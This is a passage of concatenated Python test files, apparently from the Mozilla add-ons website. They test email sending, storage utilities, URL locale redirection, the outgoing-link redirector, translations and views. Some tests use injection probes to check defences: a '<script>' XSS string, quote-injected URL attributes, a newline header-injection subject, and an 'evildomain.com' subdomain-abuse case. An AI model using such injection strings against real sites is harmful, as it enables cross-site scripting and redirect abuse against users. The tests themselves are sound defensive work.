                            recipient_list=[to], fail_silently=False)
        assert "You received this email because" in mail.outbox[0].body
        assert success, "Email wasn't sent"
        eq_(len(mail.outbox), 1)

    def test_user_mandatory(self):
        # Make sure there's no unsubscribe link in mandatory emails.
        user = UserProfile.objects.all()[0]
        to = user.email
        n = users.notifications.NOTIFICATIONS_BY_SHORT['individual_contact']
        UserNotification.objects.get_or_create(notification_id=n.id,
                                               user=user, enabled=True)
        assert n.mandatory, "Notification isn't mandatory"
        success = send_mail('test subject', 'test body', perm_setting=n,
                            recipient_list=[to], fail_silently=False)
        assert success, "Email wasn't sent"
        body = mail.outbox[0].body
        assert "Unsubscribe:" not in body
        assert "You can't unsubscribe from" in body

    def test_user_setting_unchecked(self):
        # An opted-out notification suppresses the email entirely.
        user = UserProfile.objects.all()[0]
        to = user.email
        n = users.notifications.NOTIFICATIONS_BY_SHORT['reply']
        UserNotification.objects.get_or_create(notification_id=n.id,
                                               user=user, enabled=False)
        # Confirm we're reading from the database.
        eq_(UserNotification.objects.filter(notification_id=n.id).count(), 1)
        success = send_mail('test subject', 'test body', perm_setting='reply',
                            recipient_list=[to], fail_silently=False)
        assert success, "Email wasn't sent"
        eq_(len(mail.outbox), 0)

    @mock.patch.object(settings, 'EMAIL_BLACKLIST', ())
    def test_success_real_mail(self):
        assert send_mail('test subject', 'test body',
                         recipient_list=['[email protected]'],
                         fail_silently=False)
        eq_(len(mail.outbox), 1)
        eq_(mail.outbox[0].subject.find('test subject'), 0)
        eq_(mail.outbox[0].body.find('test body'), 0)

    @mock.patch.object(settings, 'EMAIL_BLACKLIST', ())
    @mock.patch.object(settings, 'SEND_REAL_EMAIL', False)
    def test_success_fake_mail(self):
        # With SEND_REAL_EMAIL off the message is stored as a FakeEmail row
        # instead of being sent.
        assert send_mail('test subject', 'test body',
                         recipient_list=['[email protected]'],
                         fail_silently=False)
        eq_(len(mail.outbox), 0)
        eq_(FakeEmail.objects.count(), 1)
        eq_(FakeEmail.objects.get().message.endswith('test body'), True)

    @mock.patch('amo.utils.Context')
    def test_dont_localize(self, fake_Context):
        # The perm_setting label in the body must stay in English even when
        # a different locale is active; capture it via a patched Context.
        perm_setting = []

        def ctx(d, autoescape):
            perm_setting.append(unicode(d['perm_setting']))
            return TemplateContext(d, autoescape=autoescape)
        fake_Context.side_effect = ctx
        user = UserProfile.objects.all()[0]
        to = user.email
        translation.activate('zh_TW')
        send_mail('test subject', 'test body', perm_setting='reply',
                  recipient_list=[to], fail_silently=False)
        eq_(perm_setting[0], u'an add-on developer replies to my review')

    def test_send_html_mail_jinja(self):
        emails = ['[email protected]']
        subject = u'Test'
        html_template = 'tests/email/test.html'
        text_template = 'tests/email/test.txt'
        send_html_mail_jinja(subject, html_template, text_template,
                             context={}, recipient_list=emails,
                             from_email=settings.NOBODY_EMAIL,
                             use_blacklist=False,
                             perm_setting='individual_contact',
                             headers={'Reply-To': settings.EDITORS_EMAIL})
        msg = mail.outbox[0]
        message = msg.message()
        eq_(msg.to, emails)
        eq_(msg.subject, subject)
        eq_(msg.from_email, settings.NOBODY_EMAIL)
        eq_(msg.extra_headers['Reply-To'], settings.EDITORS_EMAIL)
        # The message must be multipart/alternative: text part first,
        # HTML part second, with markup only in the HTML part.
        eq_(message.is_multipart(), True)
        eq_(message.get_content_type(), 'multipart/alternative')
        eq_(message.get_default_type(), 'text/plain')
        payload = message.get_payload()
        eq_(payload[0].get_content_type(), 'text/plain')
        eq_(payload[1].get_content_type(), 'text/html')
        message1 = payload[0].as_string()
        message2 = payload[1].as_string()
        assert '<a href' not in message1, 'text-only email contained HTML!'
        assert '<a href' in message2, 'HTML email did not contain HTML!'
        unsubscribe_msg = unicode(users.notifications.individual_contact.label)
        assert unsubscribe_msg in message1
        assert unsubscribe_msg in message2

    def test_send_multilines_subjects(self):
        # Newlines in the subject would be a header-injection vector.
        send_mail('test\nsubject', 'test body', from_email='[email protected]',
                  recipient_list=['[email protected]'])
        eq_('test subject', mail.outbox[0].subject, 'Subject not stripped')

    def make_backend_class(self, error_order):
        # Build an EmailMessage factory that yields a broken message (whose
        # send() raises) for each True in `error_order`, and a real
        # EmailMessage otherwise.
        throw_error = iter(error_order)

        def make_backend(*args, **kwargs):
            if next(throw_error):
                class BrokenMessage(object):
                    def __init__(*args, **kwargs):
                        pass

                    def send(*args, **kwargs):
                        raise RuntimeError('uh oh')

                    def attach_alternative(*args, **kwargs):
                        pass
                backend = BrokenMessage()
            else:
                backend = EmailMessage(*args, **kwargs)
            return backend
        return make_backend

    @mock.patch('amo.tasks.EmailMessage')
    def test_async_will_retry(self, backend):
        backend.side_effect = self.make_backend_class([True, True, False])
        # Synchronous sending fails on the first error...
        with self.assertRaises(RuntimeError):
            send_mail('test subject',
                      'test body',
                      recipient_list=['[email protected]'])
        # ...but async sending retries until a backend succeeds.
        assert send_mail('test subject',
                         'test body',
                         async=True,
                         recipient_list=['[email protected]'])

    @mock.patch('amo.tasks.EmailMessage')
    def test_async_will_stop_retrying(self, backend):
        # With max_retries exhausted the error finally propagates.
        backend.side_effect = self.make_backend_class([True, True])
        with self.assertRaises(RuntimeError):
            send_mail('test subject',
                      'test body',
                      async=True,
                      max_retries=1,
                      recipient_list=['[email protected]'])
########NEW FILE########
__FILENAME__ = test_storage_utils
from functools import partial
import os
import tempfile
import unittest
from django.core.files.base import ContentFile
from django.core.files.storage import default_storage as storage
from nose.tools import eq_
from amo.storage_utils import (walk_storage, copy_stored_file,
move_stored_file, rm_stored_dir)
from amo.utils import rm_local_tmp_dir
def test_storage_walk():
    """walk_storage() mirrors os.walk over the storage backend.

    Nose yield-style test generator: each yielded tuple is run as a
    separate assertion.
    """
    tmp = tempfile.mkdtemp()
    jn = partial(os.path.join, tmp)
    try:
        storage.save(jn('file1.txt'), ContentFile(''))
        storage.save(jn('one/file1.txt'), ContentFile(''))
        storage.save(jn('one/file2.txt'), ContentFile(''))
        storage.save(jn('one/two/file1.txt'), ContentFile(''))
        storage.save(jn('one/three/file1.txt'), ContentFile(''))
        storage.save(jn('four/five/file1.txt'), ContentFile(''))
        storage.save(jn(u'four/kristi\u2603/kristi\u2603.txt'),
                     ContentFile(''))
        results = [(dir, set(subdirs), set(files))
                   for dir, subdirs, files in sorted(walk_storage(tmp))]
        # Entries come back in sorted path order, root first.
        yield (eq_, results.pop(0), (tmp, set(['four', 'one']), set(['file1.txt'])))
        yield (eq_, results.pop(0), (jn('four'),
                                     set(['five', 'kristi\xe2\x98\x83']), set([])))
        yield (eq_, results.pop(0), (jn('four/five'), set([]), set(['file1.txt'])))
        yield (eq_, results.pop(0), (jn('four/kristi\xe2\x98\x83'), set([]),
                                     set(['kristi\xe2\x98\x83.txt'])))
        yield (eq_, results.pop(0), (jn('one'), set(['three', 'two']),
                                     set(['file1.txt', 'file2.txt'])))
        yield (eq_, results.pop(0), (jn('one/three'), set([]), set(['file1.txt'])))
        yield (eq_, results.pop(0), (jn('one/two'), set([]), set(['file1.txt'])))
        yield (eq_, len(results), 0)
    finally:
        rm_local_tmp_dir(tmp)
def test_rm_stored_dir():
    """rm_stored_dir() removes a directory tree recursively and nothing else.

    Nose yield-style test generator.
    """
    tmp = tempfile.mkdtemp()
    jn = partial(os.path.join, tmp)
    try:
        storage.save(jn('file1.txt'), ContentFile('<stuff>'))
        storage.save(jn('one/file1.txt'), ContentFile(''))
        storage.save(jn('one/two/file1.txt'), ContentFile('moar stuff'))
        storage.save(jn(u'one/kristi\u0107/kristi\u0107.txt'),
                     ContentFile(''))
        rm_stored_dir(jn('one'))
        # Everything under one/ is gone, including non-ASCII names...
        yield (eq_, storage.exists(jn('one')), False)
        yield (eq_, storage.exists(jn('one/file1.txt')), False)
        yield (eq_, storage.exists(jn('one/two')), False)
        yield (eq_, storage.exists(jn('one/two/file1.txt')), False)
        yield (eq_, storage.exists(jn(u'one/kristi\u0107/kristi\u0107.txt')),
               False)
        # ...but siblings outside the removed dir survive.
        yield (eq_, storage.exists(jn('file1.txt')), True)
    finally:
        rm_local_tmp_dir(tmp)
class TestFileOps(unittest.TestCase):
    """copy_stored_file / move_stored_file on the storage backend."""

    def setUp(self):
        self.tmp = tempfile.mkdtemp()

    def tearDown(self):
        rm_local_tmp_dir(self.tmp)

    def path(self, path):
        # Absolute path inside this test's scratch dir.
        return os.path.join(self.tmp, path)

    def contents(self, path):
        # Raw bytes of a stored file.
        with storage.open(path, 'rb') as fp:
            return fp.read()

    def newfile(self, name, contents):
        # Create a file in storage and return its full path.
        src = self.path(name)
        storage.save(src, ContentFile(contents))
        return src

    def test_copy(self):
        src = self.newfile('src.txt', '<contents>')
        dest = self.path('somedir/dest.txt')
        copy_stored_file(src, dest)
        eq_(self.contents(dest), '<contents>')

    def test_self_copy(self):
        # Copying a file onto itself must not truncate it.
        src = self.newfile('src.txt', '<contents>')
        dest = self.path('src.txt')
        copy_stored_file(src, dest)
        eq_(self.contents(dest), '<contents>')

    def test_move(self):
        src = self.newfile('src.txt', '<contents>')
        dest = self.path('somedir/dest.txt')
        move_stored_file(src, dest)
        eq_(self.contents(dest), '<contents>')
        eq_(storage.exists(src), False)

    def test_non_ascii(self):
        src = self.newfile(u'kristi\u0107.txt',
                           u'ivan kristi\u0107'.encode('utf8'))
        dest = self.path(u'somedir/kristi\u0107.txt')
        copy_stored_file(src, dest)
        eq_(self.contents(dest), 'ivan kristi\xc4\x87')

    def test_copy_chunking(self):
        # chunk_size=1 exercises the multi-chunk code path.
        src = self.newfile('src.txt', '<contents>')
        dest = self.path('somedir/dest.txt')
        copy_stored_file(src, dest, chunk_size=1)
        eq_(self.contents(dest), '<contents>')

    def test_move_chunking(self):
        src = self.newfile('src.txt', '<contents>')
        dest = self.path('somedir/dest.txt')
        move_stored_file(src, dest, chunk_size=1)
        eq_(self.contents(dest), '<contents>')
        eq_(storage.exists(src), False)
########NEW FILE########
__FILENAME__ = test_url_prefix
from django import test, shortcuts
from django.conf import settings
from django.core.urlresolvers import set_script_prefix
from nose.tools import eq_, assert_not_equal
import test_utils
import amo.tests
from amo import urlresolvers
from amo.middleware import LocaleAndAppURLMiddleware
class MiddlewareTest(test.TestCase):
    """Tests that the locale and app redirection work properly."""
    def setUp(self):
        self.rf = test_utils.RequestFactory()
        self.middleware = LocaleAndAppURLMiddleware()
    def test_redirection(self):
        # Every bare/partial path should 301 to its fully-prefixed form.
        redirections = {
            '/': '/en-US/firefox/',
            '/en-US': '/en-US/firefox/',
            '/firefox': '/en-US/firefox/',
            '/android': '/en-US/android/',
            # Make sure we don't mess with trailing slashes.
            '/addon/1/': '/en-US/firefox/addon/1/',
            '/addon/1': '/en-US/firefox/addon/1',
            # Check an invalid locale.
            '/sda/firefox/addon/1': '/en-US/firefox/addon/1',
            # Check a consolidated language (e.g. es-* -> es).
            '/es-ES/firefox/addon/1': '/es/firefox/addon/1',
            '/es-PE/firefox/addon/1': '/es/firefox/addon/1',
            # /admin doesn't get an app.
            '/developers': '/en-US/developers',
        }
        for path, location in redirections.items():
            response = self.middleware.process_request(self.rf.get(path))
            eq_(response.status_code, 301)
            eq_(response['Location'], location)
    def process(self, *args, **kwargs):
        # Helper: run a GET request through the middleware and return the
        # redirect response (or None when no redirect is issued).
        request = self.rf.get(*args, **kwargs)
        return self.middleware.process_request(request)
    def test_no_redirect(self):
        # /services doesn't get an app or locale.
        response = self.process('/services')
        assert response is None
    def test_vary(self):
        # Vary must list whichever of Accept-Language / User-Agent was used
        # to guess the missing locale / app.
        response = self.process('/')
        eq_(response['Vary'], 'Accept-Language, User-Agent')
        response = self.process('/firefox')
        eq_(response['Vary'], 'Accept-Language')
        response = self.process('/en-US')
        eq_(response['Vary'], 'User-Agent')
        response = self.process('/en-US/thunderbird')
        assert 'Vary' not in response
    def test_no_redirect_with_script(self):
        # A SCRIPT_NAME prefix must not confuse the no-redirect paths.
        response = self.process('/services', SCRIPT_NAME='/oremj')
        assert response is None
    def test_get_app(self):
        # App detection from the User-Agent string.
        def check(url, expected, ua):
            response = self.process(url, HTTP_USER_AGENT=ua)
            eq_(response['Location'], expected)
        check('/en-US/', '/en-US/firefox/', 'Firefox')
        check('/de/', '/de/mobile/', 'Fennec')
        # Mobile gets priority because it has both strings in its UA...
        check('/de/', '/de/mobile/', 'Firefox Fennec')
        # SeaMonkey gets priority because it has both strings in its UA...
        check('/en-US/', '/en-US/seamonkey/', 'Firefox SeaMonkey')
        # Android can found by its user agent.
        check('/en-US/', '/en-US/android/', 'Fennec/12.0.1')
        check('/en-US/', '/en-US/android/', 'Fennec/12')
        check('/en-US/', '/en-US/android/', 'Fennec/11.0')
        check('/en-US/', '/en-US/mobile/', 'Fennec/10.9.1')
        check('/en-US/', '/en-US/mobile/', 'Fennec/10.9')
        # And the user agent changed again.
        check('/en-US/', '/en-US/android/',
              'Mozilla/5.0 (Android; Mobile; rv:17.0) Gecko/17.0 Firefox/17.0')
        # And the user agent yet changed again.
        check('/en-US/', '/en-US/android/',
              'Mozilla/5.0 (Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')
        # And the tablet user agent yet changed again!
        check('/en-US/', '/en-US/android/',
              'Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')
    def test_get_lang(self):
        # An explicit ?lang= overrides the URL locale and is stripped from
        # the redirected query string.
        def check(url, expected):
            response = self.process(url)
            eq_(response['Location'], expected)
        check('/services?lang=fr', '/services')
        check('/en-US/firefox?lang=fr', '/fr/firefox/')
        check('/de/admin/?lang=fr&foo=bar', '/fr/admin/?foo=bar')
        check('/en-US/firefox/?lang=fake', '/en-US/firefox/')
        check('/firefox/?lang=fr', '/fr/firefox/')
        check('/firefox/?lang=fake', '/en-US/firefox/')
        check('/en-US/extensions/?foo=fooval&bar=barval&lang=fr',
              '/fr/firefox/extensions/?foo=fooval&bar=barval')
        check('/en-US/firefox?lang=es-PE', '/es/firefox/')
class TestPrefixer:
    """Unit tests for urlresolvers.Prefixer (nose-style, no TestCase base)."""
    def tearDown(self):
        # Drop the thread-local prefixer and reset Django's script prefix so
        # state doesn't leak between tests.
        urlresolvers.clean_url_prefixes()
        set_script_prefix('/')
    def test_split_path(self):
        # split_path -> (locale, app, remainder); '' where a part is absent.
        def split_eq(url, locale, app, path):
            rf = test_utils.RequestFactory()
            prefixer = urlresolvers.Prefixer(rf.get(url))
            actual = (prefixer.locale, prefixer.app, prefixer.shortened_path)
            eq_(actual, (locale, app, path))
        split_eq('/', '', '', '')
        split_eq('/en-US', 'en-US', '', '')
        split_eq('/en-US/firefox', 'en-US', 'firefox', '')
        split_eq('/en-US/firefox/', 'en-US', 'firefox', '')
        split_eq('/en-US/firefox/foo', 'en-US', 'firefox', 'foo')
        split_eq('/en-US/firefox/foo/', 'en-US', 'firefox', 'foo/')
        split_eq('/en-US/foo', 'en-US', '', 'foo')
        split_eq('/en-US/foo/', 'en-US', '', 'foo/')
        # Invalid locales are dropped, not kept as part of the path.
        split_eq('/bad/firefox/foo', '', 'firefox', 'foo')
        split_eq('/bad/firefox/foo/', '', 'firefox', 'foo/')
        split_eq('/firefox/foo', '', 'firefox', 'foo')
        split_eq('/firefox/foo/', '', 'firefox', 'foo/')
        split_eq('/foo', '', '', 'foo')
        split_eq('/foo/', '', '', 'foo/')
    def test_fix(self):
        # fix() prepends the current locale and, except for reserved paths
        # like /admin, the current app.
        rf = test_utils.RequestFactory()
        prefixer = urlresolvers.Prefixer(rf.get('/'))
        eq_(prefixer.fix('/'), '/en-US/firefox/')
        eq_(prefixer.fix('/foo'), '/en-US/firefox/foo')
        eq_(prefixer.fix('/foo/'), '/en-US/firefox/foo/')
        eq_(prefixer.fix('/admin'), '/en-US/admin')
        eq_(prefixer.fix('/admin/'), '/en-US/admin/')
        prefixer.locale = 'de'
        prefixer.app = 'thunderbird'
        eq_(prefixer.fix('/'), '/de/thunderbird/')
        eq_(prefixer.fix('/foo'), '/de/thunderbird/foo')
        eq_(prefixer.fix('/foo/'), '/de/thunderbird/foo/')
        eq_(prefixer.fix('/admin'), '/de/admin')
        eq_(prefixer.fix('/admin/'), '/de/admin/')
    def test_reverse(self):
        # Make sure it works outside the request.
        eq_(urlresolvers.reverse('home'), '/')
        # With a request, locale and app prefixes work.
        client = test.Client()
        client.get('/')
        eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
    def test_script_name(self):
        # The WSGI SCRIPT_NAME must survive both fix() and reverse().
        rf = test_utils.RequestFactory()
        request = rf.get('/foo', SCRIPT_NAME='/oremj')
        prefixer = urlresolvers.Prefixer(request)
        eq_(prefixer.fix(prefixer.shortened_path), '/oremj/en-US/firefox/foo')
        # Now check reverse.
        urlresolvers.set_url_prefix(prefixer)
        set_script_prefix('/oremj')
        eq_(urlresolvers.reverse('home'), '/oremj/en-US/firefox/')
class TestPrefixerActivate(amo.tests.TestCase):
    """self.activate() installs a temporary locale/app prefixer and the
    default (en-US/firefox) comes back once the context manager exits."""
    def test_activate_locale(self):
        with self.activate(locale='fr'):
            eq_(urlresolvers.reverse('home'), '/fr/firefox/')
        eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
    def test_activate_app(self):
        with self.activate(app='mobile'):
            eq_(urlresolvers.reverse('home'), '/en-US/mobile/')
        eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
    def test_activate_app_locale(self):
        with self.activate(locale='de', app='thunderbird'):
            eq_(urlresolvers.reverse('home'), '/de/thunderbird/')
        eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
def test_redirect():
    """Make sure django.shortcuts.redirect uses our reverse."""
    # A GET primes the thread-local prefixer so reverse() knows which
    # locale/app to prepend.
    test.Client().get('/')
    redirect = shortcuts.redirect('home')
    eq_(redirect['Location'], '/en-US/firefox/')
def test_outgoing_url():
    """get_outgoing_url() signs external URLs, skips its own host and the
    whitelist, and resists subdomain abuse of the no-double-escape rule."""
    # Manually save the settings we clobber; restored in the finally below.
    redirect_url = settings.REDIRECT_URL
    secretkey = settings.REDIRECT_SECRET_KEY
    exceptions = settings.REDIRECT_URL_WHITELIST
    settings.REDIRECT_URL = 'http://example.net'
    settings.REDIRECT_SECRET_KEY = 'sekrit'
    settings.REDIRECT_URL_WHITELIST = ['nicedomain.com']
    try:
        myurl = 'http://example.com'
        s = urlresolvers.get_outgoing_url(myurl)
        # Regular URLs must be escaped.
        eq_(s,
            'http://example.net/bc7d4bb262c9f0b0f6d3412ede7d3252c2e311bb1d55f6'
            '2315f636cb8a70913b/'
            'http%3A//example.com')
        # No double-escaping of outgoing URLs.
        s2 = urlresolvers.get_outgoing_url(s)
        eq_(s, s2)
        evil = settings.REDIRECT_URL.rstrip('/') + '.evildomain.com'
        s = urlresolvers.get_outgoing_url(evil)
        assert_not_equal(s, evil,
                         'No subdomain abuse of double-escaping protection.')
        nice = 'http://nicedomain.com/lets/go/go/go'
        eq_(nice, urlresolvers.get_outgoing_url(nice))
    finally:
        # Restore the original settings no matter what.
        settings.REDIRECT_URL = redirect_url
        settings.REDIRECT_SECRET_KEY = secretkey
        settings.REDIRECT_URL_WHITELIST = exceptions
def test_outgoing_url_dirty_unicode():
    # Non-ASCII URLs must not blow up the redirector; we only assert that
    # the call does not raise.
    bad = (u'http://chupakabr.ru/\u043f\u0440\u043e\u0435\u043a\u0442\u044b/'
           u'\u043c\u0443\u0437\u044b\u043a\u0430-vkontakteru/')
    urlresolvers.get_outgoing_url(bad)  # bug 564057
def test_outgoing_url_query_params():
    """Query params must survive the redirector with '&' and '=' intact."""
    # (The original test ran this exact check twice back to back; the
    # duplicate added nothing and has been removed.)
    url = 'http://xx.com?q=1&v=2'
    fixed = urlresolvers.get_outgoing_url(url)
    assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed
    # Check XSS vectors: quotes and spaces must be percent-escaped.
    url = 'http://xx.com?q=1&v=2" style="123"'
    fixed = urlresolvers.get_outgoing_url(url)
    assert fixed.endswith('%3A//xx.com%3Fq=1&v=2%22%20style=%22123%22'), fixed
def check(x, y):
    """Assert that Accept-Language header ``x`` resolves to locale ``y``.

    (Was a lambda assigned to a name; PEP 8 E731 prefers a def.)
    """
    eq_(urlresolvers.lang_from_accept_header(x), y)
def test_parse_accept_language():
    # Sanity-check that every locale the cases below rely on is supported.
    expected = 'ga-IE', 'zh-TW', 'zh-CN', 'en-US', 'fr'
    for lang in expected:
        assert lang in settings.AMO_LANGUAGES, lang
    # (Accept-Language header value, expected resolved locale)
    d = (('ga-ie', 'ga-IE'),
         # Capitalization is no big deal.
         ('ga-IE', 'ga-IE'),
         ('GA-ie', 'ga-IE'),
         # Go for something less specific.
         ('fr-FR', 'fr'),
         # Go for something more specific.
         ('ga', 'ga-IE'),
         ('ga-XX', 'ga-IE'),
         # With multiple zh-XX choices, choose the first alphabetically.
         ('zh', 'zh-CN'),
         # Default to en-us.
         ('xx', 'en-US'),
         # Check q= sorting.
         ('fr,en;q=0.8', 'fr'),
         ('en;q=0.8,fr,ga-IE;q=0.9', 'fr'),
         # Beware of invalid headers.
         ('en;q=wtf,fr,ga-IE;q=oops', 'en-US'),
         # zh is a partial match but it's still preferred.
         ('zh, fr;q=0.8', 'zh-CN'),
         # Caps + q= sorting.
         ('ga-IE,en;q=0.8,fr;q=0.6', 'ga-IE'),
         ('fr-fr, en;q=0.8, es;q=0.2', 'fr'),
         # Consolidated languages.
         ('es-PE', 'es'),
         )
    for x, y in d:
        yield check, x, y
class TestShorter(amo.tests.TestCase):
    def test_no_shorter_language(self):
        # 'zh' normally upgrades to 'zh-CN'...
        check('zh', 'zh-CN')
        # ...but when the longer code is missing from LANGUAGE_URL_MAP we
        # fall back to the default locale (settings.LANGUAGE_CODE).
        with self.settings(LANGUAGE_URL_MAP={'en-us': 'en-US'}):
            check('zh', 'en-US')
########NEW FILE########
__FILENAME__ = test_utils_
import collections
from nose.tools import eq_, ok_
import amo
from amo import floor_version
from amo.utils import attach_trans_dict
from addons.models import Addon
class TestAttachTransDict(amo.tests.TestCase):
    """
    Tests for attach_trans_dict. For convenience, we re-use Addon model instead
    of mocking one from scratch and we rely on internal Translation unicode
    implementation, because mocking django models and fields is just painful.
    """
    def test_basic(self):
        # Build an addon with one translation per translated field.
        addon = amo.tests.addon_factory(
            name='Name', description='Description <script>alert(42)</script>!',
            eula='', summary='Summary', homepage='http://home.pa.ge',
            developer_comments='Developer Comments', privacy_policy='Policy',
            support_email='[email protected]', support_url='http://su.pport.url')
        addon.save()
        # Quick sanity checks: is description properly escaped? The underlying
        # implementation should leave localized_string un-escaped but never use
        # it for __unicode__. We depend on this behaviour later in the test.
        ok_('<script>' in addon.description.localized_string)
        ok_(not '<script>' in addon.description.localized_string_clean)
        ok_(not '<script>' in unicode(addon.description))
        # Attach trans dict.
        attach_trans_dict(Addon, [addon])
        ok_(isinstance(addon.translations, collections.defaultdict))
        translations = dict(addon.translations)
        # addon.translations is a defaultdict.
        eq_(addon.translations['whatever'], [])
        # No-translated fields should be absent.
        eq_(addon.thankyou_note_id, None)
        ok_(None not in translations)
        # Build expected translations dict: {field id: [(locale, text)]}.
        expected_translations = {
            addon.eula_id: [('en-us', unicode(addon.eula))],
            addon.privacy_policy_id:
                [('en-us', unicode(addon.privacy_policy))],
            addon.description_id: [
                ('en-us', unicode(addon.description))],
            addon.developer_comments_id:
                [('en-us', unicode(addon.developer_comments))],
            addon.summary_id: [('en-us', unicode(addon.summary))],
            addon.homepage_id: [('en-us', unicode(addon.homepage))],
            addon.name_id: [('en-us', unicode(addon.name))],
            addon.support_email_id: [('en-us', unicode(addon.support_email))],
            addon.support_url_id: [('en-us', unicode(addon.support_url))]
        }
        eq_(translations, expected_translations)
    def test_multiple_objects_with_multiple_translations(self):
        # Each object must get all of its own locales, and nothing from the
        # other object.
        addon = amo.tests.addon_factory()
        addon.description = {
            'fr': 'French Description',
            'en-us': 'English Description'
        }
        addon.save()
        addon2 = amo.tests.addon_factory(description='English 2 Description')
        addon2.name = {
            'fr': 'French 2 Name',
            'en-us': 'English 2 Name',
            'es': 'Spanish 2 Name'
        }
        addon2.save()
        attach_trans_dict(Addon, [addon, addon2])
        eq_(set(addon.translations[addon.description_id]),
            set([('en-us', 'English Description'),
                 ('fr', 'French Description')]))
        eq_(set(addon2.translations[addon2.name_id]),
            set([('en-us', 'English 2 Name'),
                 ('es', 'Spanish 2 Name'),
                 ('fr', 'French 2 Name')]))
def test_has_links():
    """has_links() detects anchor tags, bare URLs, and unclosed markup."""
    html = 'a text <strong>without</strong> links'
    assert not amo.utils.has_links(html)
    html = 'a <a href="http://example.com">link</a> with markup'
    assert amo.utils.has_links(html)
    html = 'a http://example.com text link'
    assert amo.utils.has_links(html)
    # Even badly-formed (unclosed) anchors count as links.
    html = 'a badly markuped <a href="http://example.com">link'
    assert amo.utils.has_links(html)
def test_floor_version():
    # floor_version() normalizes a version string down to 'major.minor',
    # dropping patch levels, alpha/beta suffixes and */x wildcard segments.
    def c(x, y):
        eq_(floor_version(x), y)
    c(None, None)
    c('', '')
    c('3', '3.0')
    c('3.6', '3.6')
    c('3.6.22', '3.6')
    c('5.0a2', '5.0')
    c('8.0', '8.0')
    c('8.0.10a', '8.0')
    c('10.0b2pre', '10.0')
    c('8.*', '8.0')
    c('8.0*', '8.0')
    c('8.0.*', '8.0')
    c('8.x', '8.0')
    c('8.0x', '8.0')
    c('8.0.x', '8.0')
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
from datetime import datetime
import json
import urllib
from django import test
from django.conf import settings
import commonware.log
import mock
from mock import patch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
from access import acl
from access.models import Group, GroupUser
from addons.models import Addon, AddonUser
from amo.helpers import absolutify
from amo.pyquery_wrapper import PyQuery
from amo.tests import check_links
from amo.urlresolvers import reverse
from users.models import UserProfile
class Test403(amo.tests.TestCase):
    """Permission denials must render the custom amo/403.html template."""
    fixtures = ['base/users']
    def setUp(self):
        # Log in as a regular (non-admin) user so /admin is forbidden.
        assert self.client.login(username='[email protected]',
                                 password='password')
    def test_403_no_app(self):
        response = self.client.get('/en-US/admin/')
        eq_(response.status_code, 403)
        self.assertTemplateUsed(response, 'amo/403.html')
    def test_403_app(self):
        response = self.client.get('/en-US/thunderbird/admin/', follow=True)
        eq_(response.status_code, 403)
        self.assertTemplateUsed(response, 'amo/403.html')
class Test404(amo.tests.TestCase):
    def test_404_no_app(self):
        """Make sure a 404 without an app doesn't turn into a 500."""
        # That could happen if helpers or templates expect APP to be defined.
        url = reverse('amo.monitor')
        response = self.client.get(url + 'nonsense')
        eq_(response.status_code, 404)
        self.assertTemplateUsed(response, 'amo/404.html')
    def test_404_app_links(self):
        # The app-flavored 404 page should offer links back into the app.
        res = self.client.get('/en-US/thunderbird/xxxxxxx')
        eq_(res.status_code, 404)
        self.assertTemplateUsed(res, 'amo/404.html')
        links = pq(res.content)('[role=main] ul a[href^="/en-US/thunderbird"]')
        eq_(links.length, 4)
class TestCommon(amo.tests.TestCase):
    """The 'Tools' aux-nav menu must vary with the user's roles."""
    fixtures = ('base/users', 'base/global-stats', 'base/configs',
                'base/addon_3615')
    def setUp(self):
        self.url = reverse('home')
    def login(self, user=None, get=False):
        # Log in as <user>@mozilla.com; optionally return the UserProfile.
        email = '%[email protected]' % user
        super(TestCommon, self).login(email)
        if get:
            return UserProfile.objects.get(email=email)
    def test_tools_regular_user(self):
        self.login('regular')
        r = self.client.get(self.url, follow=True)
        eq_(r.context['request'].amo_user.is_developer, False)
        expected = [
            ('Tools', '#'),
            ('Submit a New Add-on', reverse('devhub.submit.1')),
            ('Developer Hub', reverse('devhub.index')),
        ]
        check_links(expected, pq(r.content)('#aux-nav .tools a'))
    def test_tools_developer(self):
        # Make them a developer.
        user = self.login('regular', get=True)
        AddonUser.objects.create(user=user, addon=Addon.objects.all()[0])
        group = Group.objects.create(name='Staff', rules='AdminTools:View')
        GroupUser.objects.create(group=group, user=user)
        r = self.client.get(self.url, follow=True)
        eq_(r.context['request'].amo_user.is_developer, True)
        # Developers additionally get the submissions manager.
        expected = [
            ('Tools', '#'),
            ('Manage My Submissions', reverse('devhub.addons')),
            ('Submit a New Add-on', reverse('devhub.submit.1')),
            ('Developer Hub', reverse('devhub.index')),
        ]
        check_links(expected, pq(r.content)('#aux-nav .tools a'))
    def test_tools_editor(self):
        self.login('editor')
        r = self.client.get(self.url, follow=True)
        request = r.context['request']
        eq_(request.amo_user.is_developer, False)
        eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
        # Editors get the editor tools entry.
        expected = [
            ('Tools', '#'),
            ('Submit a New Add-on', reverse('devhub.submit.1')),
            ('Developer Hub', reverse('devhub.index')),
            ('Editor Tools', reverse('editors.home')),
        ]
        check_links(expected, pq(r.content)('#aux-nav .tools a'))
    def test_tools_developer_and_editor(self):
        # Make them a developer.
        user = self.login('editor', get=True)
        AddonUser.objects.create(user=user, addon=Addon.objects.all()[0])
        r = self.client.get(self.url, follow=True)
        request = r.context['request']
        eq_(request.amo_user.is_developer, True)
        eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
        # Both role menus combine.
        expected = [
            ('Tools', '#'),
            ('Manage My Submissions', reverse('devhub.addons')),
            ('Submit a New Add-on', reverse('devhub.submit.1')),
            ('Developer Hub', reverse('devhub.index')),
            ('Editor Tools', reverse('editors.home')),
        ]
        check_links(expected, pq(r.content)('#aux-nav .tools a'))
    def test_tools_admin(self):
        self.login('admin')
        r = self.client.get(self.url, follow=True)
        request = r.context['request']
        eq_(request.amo_user.is_developer, False)
        eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
        eq_(acl.action_allowed(request, 'Localizer', '%'), True)
        eq_(acl.action_allowed(request, 'Admin', '%'), True)
        expected = [
            ('Tools', '#'),
